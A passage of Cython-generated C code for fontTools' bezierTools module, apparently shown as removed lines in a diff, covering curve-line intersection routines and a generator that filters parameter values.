__PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1245, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1245, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_i); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_i, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = 
PyObject_RichCompare(__pyx_float_0_0, __pyx_cur_scope->__pyx_v_i, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_i, __pyx_int_1, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1245, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_i))) __PYX_ERR(0, 1245, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line) { - PyObject *__pyx_v_aligned_curve = NULL; - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_v_d = NULL; - PyObject 
*__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - Py_ssize_t __pyx_t_6; - int __pyx_t_7; - PyObject *__pyx_t_8 = NULL; - PyObject *(*__pyx_t_9)(PyObject *); - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_line_intersections_t", 1); - - /* "fontTools/misc/bezierTools.py":1236 - * - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) # <<<<<<<<<<<<<< - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_alignment_transformation); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_4)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v_line}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_transformPoints); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_5 = 
0; - #if CYTHON_UNPACK_METHODS - if (likely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_curve}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1236, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_aligned_curve = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1237 - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: # <<<<<<<<<<<<<< - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - */ - __pyx_t_6 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1237, __pyx_L1_error) - __pyx_t_7 = (__pyx_t_6 == 3); - if (__pyx_t_7) { - - /* "fontTools/misc/bezierTools.py":1238 - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) # <<<<<<<<<<<<<< - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_aligned_curve); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - 
__Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1238, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - __pyx_t_4 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_4); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_8 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1238, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_8); - index = 0; __pyx_t_3 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_1 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_1)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 2; __pyx_t_4 = __pyx_t_9(__pyx_t_8); if (unlikely(!__pyx_t_4)) goto __pyx_L4_unpacking_failed; - 
__Pyx_GOTREF(__pyx_t_4); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_9(__pyx_t_8), 3) < 0) __PYX_ERR(0, 1238, __pyx_L1_error) - __pyx_t_9 = NULL; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_9 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1238, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_a = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_b = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_c = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1239 - * if len(curve) == 3: - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) # <<<<<<<<<<<<<< - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = __Pyx_GetItemInt(__pyx_v_c, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_10 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_t_1, __pyx_t_3, __pyx_t_8}; - __pyx_t_2 = 
__Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_5, 3+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1239, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __pyx_v_intersections = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1237 - * def _curve_line_intersections_t(curve, line): - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: # <<<<<<<<<<<<<< - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1240 - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - */ - __pyx_t_6 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1240, __pyx_L1_error) - __pyx_t_7 = (__pyx_t_6 == 4); - if (likely(__pyx_t_7)) { - - /* "fontTools/misc/bezierTools.py":1241 - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) # <<<<<<<<<<<<<< - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_aligned_curve); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_4, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if ((likely(PyTuple_CheckExact(__pyx_t_8))) || (PyList_CheckExact(__pyx_t_8))) { - PyObject* sequence = __pyx_t_8; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1241, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_4 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - __pyx_t_3 = PyList_GET_ITEM(sequence, 2); - __pyx_t_1 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_4,&__pyx_t_2,&__pyx_t_3,&__pyx_t_1}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_4,&__pyx_t_2,&__pyx_t_3,&__pyx_t_1}; - __pyx_t_10 = PyObject_GetIter(__pyx_t_8); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1241, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_10); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_9(__pyx_t_10); if (unlikely(!item)) goto __pyx_L6_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_9(__pyx_t_10), 4) < 0) __PYX_ERR(0, 1241, __pyx_L1_error) - __pyx_t_9 = NULL; 
- __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L7_unpacking_done; - __pyx_L6_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_9 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1241, __pyx_L1_error) - __pyx_L7_unpacking_done:; - } - __pyx_v_a = __pyx_t_4; - __pyx_t_4 = 0; - __pyx_v_b = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_c = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_d = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1242 - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) # <<<<<<<<<<<<<< - * else: - * raise ValueError("Unknown curve degree") - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_solveCubic); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_c, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_10 = __Pyx_GetItemInt(__pyx_v_d, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = 
{__pyx_t_11, __pyx_t_3, __pyx_t_2, __pyx_t_4, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 4+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_v_intersections = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1240 - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1244 - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - * else: - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * return sorted(i for i in intersections if 0.0 <= i <= 1) - * - */ - /*else*/ { - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1244, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_Raise(__pyx_t_8, 0, 0, 0); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __PYX_ERR(0, 1244, __pyx_L1_error) - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(NULL, __pyx_v_intersections); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_10 = __Pyx_Generator_Next(__pyx_t_1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1245, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = ((PyObject*)__pyx_t_10); - __pyx_t_10 = 0; - __pyx_t_12 = PyList_Sort(__pyx_t_8); if (unlikely(__pyx_t_12 == ((int)-1))) __PYX_ERR(0, 1245, __pyx_L1_error) - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_aligned_curve); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_78curveLineIntersections, "curveLineIntersections(curve, line)\nFinds intersections between a curve and a line.\n\n Args:\n curve: List of coordinates of the curve segment as 2D tuples.\n line: List of coordinates of the line segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = curveLineIntersections(curve, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_79curveLineIntersections = {"curveLineIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_78curveLineIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve = 0; - PyObject *__pyx_v_line = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED 